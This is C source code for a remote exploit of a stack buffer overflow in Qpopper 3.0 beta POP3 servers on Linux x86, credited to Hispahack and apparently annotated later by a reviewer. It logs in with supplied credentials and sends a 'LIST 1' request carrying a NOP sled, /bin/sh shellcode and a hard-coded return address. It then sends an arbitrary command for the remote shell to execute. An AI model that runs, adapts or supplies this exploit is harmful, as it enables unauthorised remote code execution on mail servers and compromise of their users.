- /*
- * !Hispahack Research Team
- * http://hispahack.ccc.de
- *
- * By Zhodiac <zhodiac@softhome.net>
- *
- * Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53)
- * Overflow at pop_list()->pop_msg()
- *
- * Tested: (overflowable)
- *
- * 3.0beta28 offset=0
- * 3.0beta26 offset=0
- * 3.0beta25 offset=0
- *
- * Untested: (but overflowable)
- *
- * 3.0beta29
- * 3.0beta28
- * 3.0beta27
- * 3.0beta26
- * 3.0beta25
- * 3.0beta24
- * 3.0beta23
- * 3.0beta22
- * 3.0beta21
- * 3.0beta20
- * 3.0beta19
- * 3.0beta18
- * 3.0beta17
- * 3.0beta16
- * 3.0beta15
- * 3.0beta14
- * 3.0beta13
- * 3.0beta12
- * 3.0beta11
- * 3.0beta10
- * 3.0beta9
- * 3.0beta8
- * 3.0beta7
- * 3.0beta6
- * 3.0beta5
- * 3.0beta4
- * 3.0beta3
- * 3.0beta2
- * 3.0beta1
- * 3.0 *
- *
- * #include <standar/disclaimer.h>
- *
- * This code is dedicated to my love [CrAsH]] and to all the people who
- * were raided in Spain in the last few days.
- *
- * Madrid 10/1/2000
- *
- * missnglnk <missnglnk@tribune.intranova.net>
- * - Added the ability to specify the command to execute on the remote host,
- * and added network support to the program so you do not need netcat
- * to use it.
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <netdb.h>
- #include <netinet/in.h>
- #include <arpa/inet.h>
-
/* Size in bytes of the request payload buffer that main() builds. */
#define BUFFERSIZE 1004
/* Filler byte written over the leading part of that buffer. */
#define NOP 0x90
/*
 * Default value stored four times at the tail of the payload buffer
 * (main() adds argv[5] to it when a fifth argument is given). A
 * hard-coded 32-bit value; the file header says the tool assumes
 * Linux x86. The commented-out alternative below zeroes it.
 */
#define OFFSET 0xbfffd9c4
// #define OFFSET 0x0

/*
 * Raw payload bytes placed inside the "LIST 1 ..." request. Treated as
 * opaque here and not decoded; the trailing "/bin/sh" is the only
 * readable part. main() measures it with strlen(), so it must contain
 * no 0x00 byte before the end (none appears in the escapes below).
 */
char shellcode[]=
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89"
"\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";
-
-
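/*
 * Print the command-line synopsis to stderr and terminate with status 1.
 *
 * progname: argv[0] as passed by main(). It may be NULL when the program
 *           is exec'd with an empty argv, which would be undefined
 *           behaviour for %s, so a fixed fallback is substituted.
 *
 * Never returns.
 */
void usage(char *progname)
{
    const char *name = progname ? progname : "(unknown)";

    /* The original message had an unbalanced "(" before the program name. */
    fprintf(stderr, "Usage: %s <hostname> <login> <password> <command> [<offset>]\n", name);
    exit(1);
}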
-
/*
 * Entry point. Builds the payload buffer, connects to argv[1] on TCP port
 * 110, sends "USER argv[2]" and "PASS argv[3]", then the "LIST 1 <buffer>"
 * request, then argv[4] as one line, printing each server reply to stdout.
 *
 * Returns 0 once close() succeeds; returns -1 when socket(), connect(),
 * read(), close() or a short write() fails, or when the greeting, USER or
 * PASS reply does not contain "+OK". Exits through usage() when argc < 5.
 *
 * NOTE(review): <string.h> (memset, memcpy, strlen, strstr) and
 * <strings.h> (bzero) are not included, so those calls rely on implicit
 * declarations, which C99 and later compilers reject.
 */
int main(int argc, char **argv)
{
    char *ptr,buffer[BUFFERSIZE],rcvbuf[4096],username[128],password[128],exploit[4096],command[4096];
    unsigned long *long_ptr,offset=OFFSET;
    int aux,sock;
    struct sockaddr_in sin;
    unsigned long ip;
    struct hostent *he;

    fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
    fprintf(stderr,"Qpopper xploit by Zhodiac <zhodiac@softhome.net>\n\n");

    if (argc<5) usage(argv[0]);

    /* Optional fifth argument adjusts the tail value. atol() reports no
     * errors, so a non-numeric argument silently adds 0. */
    if (argc==6) offset+=atol(argv[5]);

    /* Buffer layout: [filler][shellcode][4 x offset]['\0'].
     * The 16 bytes reserved after the shellcode equal 4 * sizeof(unsigned
     * long) only when long is 4 bytes (32-bit x86, as the header states);
     * on LP64 the four stores below run 16 bytes past the array. */
    ptr=buffer;
    memset(ptr,0,sizeof(buffer));
    memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16);
    ptr+=sizeof(buffer)-strlen(shellcode)-16;
    memcpy(ptr,shellcode,strlen(shellcode));
    ptr+=strlen(shellcode);
    long_ptr=(unsigned long*)ptr;
    for(aux=0;aux<4;aux++) *(long_ptr++)=offset;
    ptr=(char *)long_ptr;
    /* BUG: after the four stores ptr == buffer + sizeof(buffer), so this
     * terminator is written one byte past the end of buffer even with
     * 4-byte longs. Every in-bounds byte has been overwritten by then, so
     * the strlen(buffer) and "%s" uses below depend on that out-of-bounds
     * byte; BUFFERSIZE would need one extra byte to hold it. */
    *ptr='\0';

    /* strlen() returns size_t; "%d" expects int (should be "%zu"). */
    fprintf(stderr,"Buffer size: %d\n",strlen(buffer));
    fprintf(stderr,"Offset: 0x%lx\n\n",offset);

    /* Request lines. snprintf() truncates silently; username/password are
     * 128 bytes, so overlong argv values are cut without notice. */
    snprintf(username, sizeof(username), "USER %s\n",argv[2]);
    snprintf(password, sizeof(password), "PASS %s\n",argv[3]);
    snprintf(exploit, sizeof(exploit), "LIST 1 %s\n",buffer);
    snprintf(command, sizeof(command), "%s\n", argv[4]);

    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
        perror("socket()");
        return -1;
    }

    /* Resolve argv[1]. gethostbyname() also accepts dotted-quad input, so
     * the inet_addr() fallback is presumably reached only on lookup failure. */
    if ((he = gethostbyname(argv[1])) != NULL)
    {
        /* h_addr is a 4-byte IPv4 address; reading it through unsigned
         * long * over-reads on LP64 and violates strict aliasing. */
        ip = *(unsigned long *)he->h_addr;
    }
    else
    {
        /* BUG: inet_addr() signals failure with INADDR_NONE (all bits
         * set), not 0, and NULL is a pointer constant being compared with
         * an integer. An unparsable address passes this check, while
         * "0.0.0.0" is wrongly rejected. */
        if ((ip = inet_addr(argv[1])) == NULL)
        {
            perror("inet_addr()");
            return -1;
        }
    }

    /* sin_zero is left uninitialized; harmless for connect(). */
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = ip;
    sin.sin_port = htons(110);

    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
    {
        perror("connect()");
        return -1;
    }

    /* Each exchange below: read() one chunk, check for "+OK", echo it.
     * read() does not NUL-terminate. rcvbuf is uninitialized before this
     * first read, a reply filling all 4096 bytes leaves no terminator, and
     * a 0-byte read (peer closed) is not treated as an error, so the
     * strlen()/strstr() calls can run off the buffer and the
     * strlen() - 1 index can underflow when the buffer is empty. */
    if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
    {
        perror("read()");
        return -1;
    }

    if (strstr(rcvbuf, "+OK") == NULL)
    {
        printf("Server didnt respond with ok\n");
        rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
        printf("\t%s\n", rcvbuf);
        return -1;
    }

    /* Drop the last byte of the reply (normally the trailing "\n") and echo it. */
    rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
    printf("\t%s\n", rcvbuf);
    /* bzero() is the legacy BSD form of memset(p, 0, n) (needs <strings.h>);
     * from here on later reads are terminated unless they fill the buffer. */
    bzero(rcvbuf, sizeof(rcvbuf));

    /* BUG: write() returns ssize_t; comparing it with the size_t from
     * strlen() converts -1 to SIZE_MAX, so a failed write passes this test
     * and only a short write reaches perror(). The same applies to the
     * three write() checks further down. */
    if (write(sock, username, strlen(username)) < strlen(username))
    {
        perror("write()");
        return -1;
    }

    if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
    {
        perror("read()");
        return -1;
    }

    if (strstr(rcvbuf, "+OK") == NULL)
    {
        printf("Server didnt respond with username ok\n");
        rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
        printf("\t%s\n", rcvbuf);
        return -1;
    }

    rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
    printf("\t%s\n", rcvbuf);
    bzero(rcvbuf, sizeof(rcvbuf));

    if (write(sock, password, strlen(password)) < strlen(password))
    {
        perror("write()");
        return -1;
    }

    if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
    {
        perror("read()");
        return -1;
    }

    if (strstr(rcvbuf, "+OK") == NULL)
    {
        printf("Server didnt respond with password ok\n");
        rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
        printf("\t%s\n", rcvbuf);
        return -1;
    }

    rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
    printf("\t%s\n", rcvbuf);
    bzero(rcvbuf, sizeof(rcvbuf));

    /* The LIST request carrying the payload buffer; its reply is echoed
     * without a "+OK" check. */
    if (write(sock, exploit, strlen(exploit)) < strlen(exploit))
    {
        perror("write()");
        return -1;
    }

    if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
    {
        perror("read()");
        return -1;
    }

    rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
    printf("\t%s\n", rcvbuf);
    bzero(rcvbuf, sizeof(rcvbuf));

    /* argv[4] is sent as one line and only the first read() chunk of the
     * answer is printed; longer output is left unread. */
    if (write(sock, command, strlen(command)) < strlen(command))
    {
        perror("write()");
        return -1;
    }

    if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0)
    {
        perror("read()");
        return -1;
    }

    rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
    printf("\t%s\n", rcvbuf);
    bzero(rcvbuf, sizeof(rcvbuf));

    /* The socket is also leaked on every early return above; the process
     * exits right after, so the kernel reclaims it. */
    if (close(sock) < 0)
    {
        perror("close()");
        return -1;
    }

    return(0);
}
- /* www.hack.co.za [29 Feb 2000]*/